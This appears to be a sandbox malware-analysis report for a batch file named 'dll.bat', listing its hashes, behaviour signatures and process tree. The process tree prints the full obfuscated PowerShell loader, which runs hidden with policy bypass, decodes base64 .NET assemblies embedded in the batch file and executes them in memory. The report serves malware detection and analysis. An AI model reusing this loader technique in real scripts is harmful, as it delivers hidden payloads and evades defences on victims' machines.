Overview

overview

10

Static

static

10

Repo/bin/dll.bat

windows7-x64

7

Repo/bin/dll.bat

windows10-2004-x64

10

Repo/bin/unam.exe

windows7-x64

1

Repo/bin/unam.exe

windows10-2004-x64

1

Silent Cry...er.exe

windows7-x64

1

Silent Cry...er.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2024 12:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Repo/bin/dll.bat

  • Size

    382KB

  • MD5

    8b1f260a182f74419011f14a8ba21a37

  • SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

  • SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

  • SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

  • SSDEEP

    6144:UJ+xnM15AXYHvdijZhhzPrJaBuLEQ/npzItPvshlqfyef:f8udDJ5hmPvqlRy

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

    Download Submit

  • memory/2948-5-0x000007FEF51FE000-0x000007FEF51FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2948-6-0x000000001B510000-0x000000001B7F2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2948-7-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-8-0x0000000000680000-0x0000000000688000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2948-9-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-10-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-12-0x0000000002A90000-0x0000000002A9A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2948-11-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-13-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-14-0x0000000002AA0000-0x0000000002AEA000-memory.dmp

    Filesize

    296KB

    Download

  • memory/2948-15-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

    Download